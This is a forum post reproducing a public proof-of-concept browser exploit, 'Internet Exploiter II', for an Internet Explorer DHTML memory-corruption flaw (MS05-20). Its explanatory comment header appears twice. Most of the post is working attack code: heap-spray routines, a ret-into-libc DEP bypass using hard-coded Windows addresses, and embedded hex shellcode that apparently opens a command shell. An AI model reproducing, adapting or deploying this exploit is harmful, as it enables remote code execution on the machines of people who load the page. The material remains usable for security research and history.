Autor
Código:
<HTML><!---------------------------------------------------------------------.
__ ___ __ |
?-----. )/ ) / /,? |
.'.疮? \ // __ __ / / __ __ // |
( (_____ ? // )/ __ )/ / / )/ )/__ ___ ___// !
___ `-----,痋 /(_,/? )/ // / / // //疮)) ,;疮)) ,;疮)/ :
) / / / //疮)) // // / / // // // //=='? // // .
'竊-------?? /( /( ((__// / / /( /( /( ((__,( ((__/( __
_ ? )/ / ( ? ? / /
)\_______________________.;' / `?-berendjanwever@gmail.com--?(
. ?
:
| Internet Exploiter II v3.0 - MS05-20 DHTML memory corruption PoC exploit
| New features: Predictable location heap spray, ret-into-libc DEP bypass
| Copyright (C) 2003-2005 by Berend-Jan Wever. <berendjanwever@gmail.com>
`,__________________________________________________________________________
`,
This program is private and not intended for public use or distribution. |
It is intended as a proof-of-concept for informational purpose only. |
Running, distributing or showing this program without the author's concent !
is prohibited. Please contact the author for further information. !
:
This program is distributed in the hope that it will be useful, but WITHOUT .
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE.
____________________________________________________________________________
`,
The vulnerability: |
There is a race condition when using DHTML and javascript to append an |
element created in one window to an element created in another. Using !
createComment and appendChild when can force a "dirty" read in createChild :
which can be exploited to gain control over the process. .
The exact inner workings are unknown to the author, but the appendChild
causes a javascript error, which seems to be part of the vulnerability.
The exploit:
We will put a large number of copies of the "dirty" value we want to read
in a string and use this string as the argument in the "createComment"
call. The "dirty" value is a pointer to a structure, one of it's members
gets used in a jmp. Since the new heap spraying technique alows us to put
bytes at predictable locations, we can supply a pointer to a structure we
have created on the heap. We will put the structure at 0x08080808 and use
this value for the "dirty" read. But since it's a timing issue, it doesn't
always work; sometimes we don't control the value when it gets read. In a
number of these cases 0x11CF03F9 is used instead (why that value? I dunno).
We can take advantage of this by supplying the same structure at both
0x08080808 and 0x11CF03F9.
Throught all this we can now control the jump after the "dirty" read in
MSHTML.DLL @ 0x635F6074 (win2ksp4en)
MOV EAX, DWORD PTR [ESP+4] ; EAX = address of "dirty" memory
MOV EAX, DWORD PTR [EAX] ; EAX = 0x08080808
JMP NEAR DWORD PTR [EAX+8] ; JMP [0x08080810]
We have gained control over EIP, but we still need control over ESP for our
DEP bypassing ret-into-libc to work. We can use the fact that EAX points to
a structure under our control to load ESP from this structure. All we need
to do is ret-into-libc to code that gets ESP from memory pointed to by EAX
and the returns or jumps:
IEXPLORE.EXE @ 0x00401144
XCHG EAX,ESP ; ESP = 0x08080808
POP ESP ; ESP = [0x08080808] (our new stack)
RETN ; DEP bypassing ret-into-libc
We now control EIP and ESP, but we will need to supply our "DEP bypassing
ret-into-libc stack" at a known location and store a pointer to it at
0x08080808. We'll use 0x11CF2000 to store our stack. Depending on what
technique we use to bypass DEP, we might want to store a shellcode at a
known location too, we'll use 0x11CF3000 for out shellcode.
In short, we need to set up the heap first and put some structures at
predictable locations:
@ 0x08080808 ("dirty read structure")
dword 0x11CF2000 (&"ret-into-libc stack")
dword unused
dword 0x00401144
@ 0x11CF03F9 ("dirty read structure")
dword 0x11CF2000 (&"ret-into-libc stack")
dword unused
dword 0x00401144
@ 0x11CF2000 ("ret-into-libc stack")
dword &"ret-into-libc call 1"
dword &"ret-into-libc call 2"
X dwords "arguments 1"
dword &"ret-into-libc call 3"
X dwords "arguments 2"
...etc...
. dword &"ret-into-libc call N"
: dword 0x11CF3000 (&"shellcode")
| X dwords "arguments N"
| @ 0x11CF3000 ("shellcode")
| X bytes "shellcode"
`,__________________________________________________________________________
`,
Data Execution Prevention bypass: |
A number of tricks to bypass Windows Hardware-enforced DEP using |
ret-into-libc to specific Windows API calls have been published. This !
exploit implements two of them, namely: :
.
ZwSetInformationProcess - Skape & SkyWing
This technique uses ZwSetInformationProcess to turn of DEP for the entire
process. One call to this API causes DEP to be turned off, after which we
can return into our shellcode without DEP causing an access violation.
VirtualProtect - John Richard Moser, SkyLined
John Richard Moser theorized it would be possible to return into one of the
Virtual* API calls to turn on the execute bit on a page of memory. I came
up with a practical implementation using VirtualProtect that also brute-
forces the right memory address for the heap block by making multiple
calls. In practice this exploit creates memory blocks with a size of
. 0x80000 bytes that all start at an address ending in 0000. We therefore
: need 8 calls starting at the guessed addresses and change the address in
| steps of 0x10000 bytes. Calls with the wrong address will fail without
| further consequence, the one call with the right address will turn on the
| execute bit. After these calls, we can return into our shellcode.
`.____________________________________________________________________________
-->
<HEAD>
<LINK rel="stylesheet" type="text/css" href="/Internet%20Exploiter/style.css"></LINK>
</HEAD>
Loading <B>Kernel.js</B>: <SCRIPT src="Kernel.js"></SCRIPT>Ok.<BR>
Loading <B>Havoc.js</B>: <SCRIPT src="Havoc.js"></SCRIPT>Ok.<BR>
<SCRIPT>
__ ___ __ |
?-----. )/ ) / /,? |
.'.疮? \ // __ __ / / __ __ // |
( (_____ ? // )/ __ )/ / / )/ )/__ ___ ___// !
___ `-----,痋 /(_,/? )/ // / / // //疮)) ,;疮)) ,;疮)/ :
) / / / //疮)) // // / / // // // //=='? // // .
'竊-------?? /( /( ((__// / / /( /( /( ((__,( ((__/( __
_ ? )/ / ( ? ? / /
)\_______________________.;' / `?-berendjanwever@gmail.com--?(
. ?
:
| Internet Exploiter II v3.0 - MS05-20 DHTML memory corruption PoC exploit
| New features: Predictable location heap spray, ret-into-libc DEP bypass
| Copyright (C) 2003-2005 by Berend-Jan Wever. <berendjanwever@gmail.com>
`,__________________________________________________________________________
`,
This program is private and not intended for public use or distribution. |
It is intended as a proof-of-concept for informational purpose only. |
Running, distributing or showing this program without the author's concent !
is prohibited. Please contact the author for further information. !
:
This program is distributed in the hope that it will be useful, but WITHOUT .
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE.
____________________________________________________________________________
`,
The vulnerability: |
There is a race condition when using DHTML and javascript to append an |
element created in one window to an element created in another. Using !
createComment and appendChild when can force a "dirty" read in createChild :
which can be exploited to gain control over the process. .
The exact inner workings are unknown to the author, but the appendChild
causes a javascript error, which seems to be part of the vulnerability.
The exploit:
We will put a large number of copies of the "dirty" value we want to read
in a string and use this string as the argument in the "createComment"
call. The "dirty" value is a pointer to a structure, one of it's members
gets used in a jmp. Since the new heap spraying technique alows us to put
bytes at predictable locations, we can supply a pointer to a structure we
have created on the heap. We will put the structure at 0x08080808 and use
this value for the "dirty" read. But since it's a timing issue, it doesn't
always work; sometimes we don't control the value when it gets read. In a
number of these cases 0x11CF03F9 is used instead (why that value? I dunno).
We can take advantage of this by supplying the same structure at both
0x08080808 and 0x11CF03F9.
Throught all this we can now control the jump after the "dirty" read in
MSHTML.DLL @ 0x635F6074 (win2ksp4en)
MOV EAX, DWORD PTR [ESP+4] ; EAX = address of "dirty" memory
MOV EAX, DWORD PTR [EAX] ; EAX = 0x08080808
JMP NEAR DWORD PTR [EAX+8] ; JMP [0x08080810]
We have gained control over EIP, but we still need control over ESP for our
DEP bypassing ret-into-libc to work. We can use the fact that EAX points to
a structure under our control to load ESP from this structure. All we need
to do is ret-into-libc to code that gets ESP from memory pointed to by EAX
and the returns or jumps:
IEXPLORE.EXE @ 0x00401144
XCHG EAX,ESP ; ESP = 0x08080808
POP ESP ; ESP = [0x08080808] (our new stack)
RETN ; DEP bypassing ret-into-libc
We now control EIP and ESP, but we will need to supply our "DEP bypassing
ret-into-libc stack" at a known location and store a pointer to it at
0x08080808. We'll use 0x11CF2000 to store our stack. Depending on what
technique we use to bypass DEP, we might want to store a shellcode at a
known location too, we'll use 0x11CF3000 for out shellcode.
In short, we need to set up the heap first and put some structures at
predictable locations:
@ 0x08080808 ("dirty read structure")
dword 0x11CF2000 (&"ret-into-libc stack")
dword unused
dword 0x00401144
@ 0x11CF03F9 ("dirty read structure")
dword 0x11CF2000 (&"ret-into-libc stack")
dword unused
dword 0x00401144
@ 0x11CF2000 ("ret-into-libc stack")
dword &"ret-into-libc call 1"
dword &"ret-into-libc call 2"
X dwords "arguments 1"
dword &"ret-into-libc call 3"
X dwords "arguments 2"
...etc...
. dword &"ret-into-libc call N"
: dword 0x11CF3000 (&"shellcode")
| X dwords "arguments N"
| @ 0x11CF3000 ("shellcode")
| X bytes "shellcode"
`,__________________________________________________________________________
`,
Data Execution Prevention bypass: |
A number of tricks to bypass Windows Hardware-enforced DEP using |
ret-into-libc to specific Windows API calls have been published. This !
exploit implements two of them, namely: :
.
ZwSetInformationProcess - Skape & SkyWing
This technique uses ZwSetInformationProcess to turn of DEP for the entire
process. One call to this API causes DEP to be turned off, after which we
can return into our shellcode without DEP causing an access violation.
VirtualProtect - John Richard Moser, SkyLined
John Richard Moser theorized it would be possible to return into one of the
Virtual* API calls to turn on the execute bit on a page of memory. I came
up with a practical implementation using VirtualProtect that also brute-
forces the right memory address for the heap block by making multiple
calls. In practice this exploit creates memory blocks with a size of
. 0x80000 bytes that all start at an address ending in 0000. We therefore
: need 8 calls starting at the guessed addresses and change the address in
| steps of 0x10000 bytes. Calls with the wrong address will fail without
| further consequence, the one call with the right address will turn on the
| execute bit. After these calls, we can return into our shellcode.
`.____________________________________________________________________________
-->
<HEAD>
<LINK rel="stylesheet" type="text/css" href="/Internet%20Exploiter/style.css"></LINK>
</HEAD>
Loading <B>Kernel.js</B>: <SCRIPT src="Kernel.js"></SCRIPT>Ok.<BR>
Loading <B>Havoc.js</B>: <SCRIPT src="Havoc.js"></SCRIPT>Ok.<BR>
<SCRIPT>
Código
/**********************************************************************
* Magic values *
**********************************************************************/
var iBlockSize = 0x10000; // Heap blocks are aligned to 0xXXXX0000.
var iPageSize = 0x80000; // Min size to allocate a separate page.
// This is what we use in the "dirty" read:
var iAddressOverwrite = 0x08080808;
// This is where we will expect out block with data:
// (We will also expect it at 0x08080808)
var iAddress = 0x11CF0000;
// Here are some offsets into this block where we store data.
var iOffsetReAlignStruct1 = 0x03f9; // 0x11CF03F9 (see above).
var iOffsetReAlignStruct2 = 0x0808; // 0x08080808 is our target.
// We need to store our ret-into-libc stacks somewhere:
var iOffsetRetIntoLibC_VirtualProtect = 0x2000;
var iOffsetRetIntoLibC_ZwSetInformationProcess = 0x2800;
// We need shellcode somewhere:
var iOffsetShellcode = 0x3000;
// VirtualProtect needs to store the old protection flags somewhere:
var iOffsetOldProtect = 0x4000;
// ZwSetInformationProcess needs to read the execute flags from
// somewhere:
var iOffsetMEM_EXECUTE_OPTION_ENABLE = 0x4000;
// ret-into-libc hard-coded addresses and values:
// iexplore.exe
var iAddressStackHyjack = 0x00401144; // steal ESP
// kernel32.dll v5.1.2600.2180 (Windows XP SP2)
var iKernel32_PopEspRet = 0x7C80BCA8; // Unused atm.
var iKernel32_VirtualProtect = 0x7C801AD0;
var PAGE_EXECUTE_READWRITE = 0x40;
// ntdll.dll v5.1.2600.2180 (Windows XP SP2)
var iNtdll_ZwSetInformationProcess = 0x7C90E62D
var ProcessExecuteFlags = 0x22
var MEM_EXECUTE_OPTION_ENABLE = 0x2;
var iOffsetRetIntoLibC = iOffsetRetIntoLibC_ZwSetInformationProcess;
try {
// We need to have an element in another window, so we try to create
// one in the window that opened us. This will most likely fail
// the first time because of XSS restrictions. In that case we open
// this page in a new window and try again from there.
oParentElement = opener.document.createComment("");
} catch(e) {
// both open() and showHelp() work with this
window.open(document.location.href);
}
if (oParentElement) {
document.write("<H2>HAVOC</H2>");
oHavoc = new cHavoc();
/******************************************************************
* Create DEP bypass ret-into-libc stacks as UNICODE strings *
******************************************************************/
document.write("<H2>RetIntoLibC (VirtualProtect):</H2>");
// Is DEP easily evadable? - John Richard Moser
// http://www.securityfocus.com/archive/1/386958
var oRetIntoLibC_VirtualProtect = new cRetIntoLibC();
// Create 8 calls to VirtualProtect with changing addresses to
// brute force the address of the block that contains our data.
for (var i = 0; i < iPageSize; i += iBlockSize) {
oRetIntoLibC_VirtualProtect.RetInto(
iKernel32_VirtualProtect,
oHavoc.dwords(
iAddress-i,
iPageSize,
PAGE_EXECUTE_READWRITE,
iAddress+iOffsetOldProtect
)
);
document.write("VirtualProtect(address = 0x" + IntToHexString(iAddress-i, 32) + ", " +
"pagesize = " + IntToHexString(iPageSize, 32) + ", " +
"newprotect = " + IntToHexString(PAGE_EXECUTE_READWRITE, 32) + ", " +
"&oldprotect = " + IntToHexString(iAddress+iOffsetOldProtect, 32) + ") @ 0x" +
IntToHexString(iKernel32_VirtualProtect, 32) + ".<BR>");
}
// After we've turned on the execute bit, run the shellcode.
oRetIntoLibC_VirtualProtect.RetInto(iAddress+iOffsetShellcode);
document.write("Shellcode() @ 0x" + IntToHexString(iAddress+iOffsetShellcode, 32) + ".<BR>");
document.write("<BR>");
var sRetIntoLibC_VirtualProtect = oRetIntoLibC_VirtualProtect.toString();
document.write("RetIntoLibC stack is " + IntToBytesString(sRetIntoLibC_VirtualProtect.length << 1) + ".<BR>");
document.write("<H2>RetIntoLibC (ZwSetInformationProcess):</H2>");
// Bypassing Windows Hardware-enforced DEP - Skape & SkyWing
// Uninformed volume 2, article 4 - www.uninformed.org
// One call to ZwSetInformationProcess to turn off DEP.
var oRetIntoLibC_ZwSetInformationProcess = new cRetIntoLibC();
oRetIntoLibC_ZwSetInformationProcess.RetInto(
iNtdll_ZwSetInformationProcess,
oHavoc.dwords(
-1,
ProcessExecuteFlags,
iAddress+iOffsetMEM_EXECUTE_OPTION_ENABLE,
4 // sizeof (DWORD)
)
);
document.write("ZwSetInformationProcess(Handle = -1 (Current Process), " +
"ProcessExecuteFlags = " + IntToHexString(ProcessExecuteFlags, 32) + ", " +
"&ExecuteFlags = " + IntToHexString(iAddress+iOffsetMEM_EXECUTE_OPTION_ENABLE, 32) + ", " +
"sizeof(ExecuteFlags) = 0x4) @ 0x" +
IntToHexString(iNtdll_ZwSetInformationProcess, 32) + ".<BR>");
// After we've turned on the execute bit, run the shellcode.
oRetIntoLibC_ZwSetInformationProcess.RetInto(iAddress+iOffsetShellcode);
document.write("Shellcode() @ 0x" + IntToHexString(iAddress+iOffsetShellcode, 32) + ".<BR>");
document.write("<BR>");
var sRetIntoLibC_ZwSetInformationProcess = oRetIntoLibC_ZwSetInformationProcess.toString();
document.write("RetIntoLibC stack is " + IntToBytesString(sRetIntoLibC_ZwSetInformationProcess.length << 1) + ".<BR>");
/******************************************************************
* Create shellcode as UNICODE string *
******************************************************************/
document.write("<H2>Shellcode:</H2>");
var sShellcode = oHavoc.hexString(
"90 90 90 90 eb 43 56 57 8b 45 3c 8b 54 05 78 01 ea 52 8b 52 20 01 " +
"ea 31 c0 31 c9 41 8b 34 8a 01 ee 31 ff c1 cf 13 ac 01 c7 85 c0 75 " +
"f6 39 df 75 ea 5a 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb 8b 04 " +
"8b 01 e8 5f 5e ff e0 fc 31 c0 64 8b 40 30 8b 40 0c 8b 70 1c ad 8b " +
"68 08 31 c0 66 b8 6c 6c 50 68 33 32 2e 64 68 77 73 32 5f 54 bb 71 " +
"a7 e8 fe e8 90 ff ff ff 89 ef 89 c5 81 c4 70 fe ff ff 54 31 c0 fe " +
"c4 40 50 bb 22 7d ab 7d e8 75 ff ff ff 31 c0 50 50 50 50 40 50 40 " +
"50 bb a6 55 34 79 e8 61 ff ff ff 89 c6 31 c0 50 50 35 02 01 70 cc " +
"fe cc 50 89 e0 50 6a 10 50 56 bb 81 b4 2c be e8 42 ff ff ff 31 c0 " +
"50 56 bb d3 fa 58 9b e8 34 ff ff ff 58 60 6a 10 54 50 56 bb 47 f3 " +
"56 c6 e8 23 ff ff ff 89 c6 31 db 53 68 2e 63 6d 64 89 e1 41 31 db " +
"56 56 56 53 53 31 c0 fe c4 40 50 53 53 53 53 53 53 53 53 53 53 6a " +
"44 89 e0 53 53 53 53 54 50 53 53 53 43 53 4b 53 53 51 53 87 fd bb " +
"21 d0 05 d0 e8 df fe ff ff 5b 31 c0 48 50 53 bb 43 cb 8d 5f e8 cf " +
"fe ff ff 56 87 ef bb 12 6b 6d d0 e8 c2 fe ff ff 83 c4 5c 61 eb 89 "
);
document.write("Shellcode is " + IntToBytesString(sShellcode.length<<1)+".<BR>");
/******************************************************************
* Create ret-into-libc exploit struct as UNICODE string *
******************************************************************/
var sReAlignStruct = oHavoc.dwords(
iAddress+iOffsetRetIntoLibC, // sReAlignStruct[0] (Ret-into-libc stack)
0xCCCCCCCC, // (unused)
iAddressStackHyjack // sReAlignStruct[2] (exploit jmp address)
);
/******************************************************************
* Create a heap block with the strings in the right location *
******************************************************************/
document.write("<H2>Heap spray:</H2>");
var sHeap = "";
document.write("Putting re-aligning struct at offset 0x" + IntToHexString(iOffsetReAlignStruct1, 16) + "...");
sHeap = oHavoc.fill(sHeap, iOffsetReAlignStruct1-1) + oHavoc.byteShift(sReAlignStruct); //ODD!
document.write("done.<BR>Putting re-aligning struct at offset 0x" + IntToHexString(iOffsetReAlignStruct2, 16) + "...");
sHeap = oHavoc.fill(sHeap, iOffsetReAlignStruct2) + sReAlignStruct;
document.write("done.<BR>Putting RetIntoLibC VirtualProtect at offset 0x" + IntToHexString(iOffsetRetIntoLibC_VirtualProtect, 16) + "...");
sHeap = oHavoc.fill(sHeap, iOffsetRetIntoLibC_VirtualProtect) + sRetIntoLibC_VirtualProtect;
document.write("done.<BR>Putting RetIntoLibC ZwSetInformationProcess at offset 0x" + IntToHexString(iOffsetRetIntoLibC_ZwSetInformationProcess, 16) + "...");
sHeap = oHavoc.fill(sHeap, iOffsetRetIntoLibC_ZwSetInformationProcess) + sRetIntoLibC_ZwSetInformationProcess;
document.write("done.<BR>Putting Shellcode at offset 0x" + IntToHexString(iOffsetShellcode, 16) + "...");
sHeap = oHavoc.fill(sHeap, iOffsetShellcode) + sShellcode;
document.write("done.<BR>Putting MEM_EXECUTE_OPTION_ENABLE (" + IntToHexString(MEM_EXECUTE_OPTION_ENABLE, 32) + ") at offset 0x" + IntToHexString(iOffsetMEM_EXECUTE_OPTION_ENABLE, 16) + "...");
sHeap = oHavoc.fill(sHeap, iOffsetMEM_EXECUTE_OPTION_ENABLE) + oHavoc.dwords(MEM_EXECUTE_OPTION_ENABLE);
document.write("done.<BR>");
/******************************************************************
* Spray the heap up to and including the target address *
******************************************************************/
oHavoc.spray(sHeap, iBlockSize, iPageSize, iAddress+iPageSize);
/******************************************************************
* HERE BE MONSTERS *
******************************************************************/
document.write("<H2>Exploit:</H2>");
document.write("Creating exploit string...");
sAddressOverwrite = oHavoc.dwords(iAddressOverwrite);
var sMSHTMLHeap = oHavoc.fill("", 0x200, sAddressOverwrite);
document.write("done.<BR>Creating parent element...");
var oParentWindow = opener;
var oParentElement = oParentWindow.document.createComment(sMSHTMLHeap);
alert();
document.write("done.<BR>Creating child elements and appending to parent...");
var oChildWindow = window;
for(i=0;i<1024;i++) try {
window.status = sMSHTMLHeap;
oChildElement = oChildWindow.document.createComment(sMSHTMLHeap)
window.status = sAddressOverwrite + "Exploiting... " + Math.round(100*i/1024) + "% done.";
oParentElement.appendChild(oChildElement);
} catch (e) { }
window.status = sAddressOverwrite + "Exploiting... failed.";
//document.write("done.<BR>Closing window...");
//oChildWindow.close();
document.write("done.<BR>");
document.write("Failed!<BR>");
}
En línea
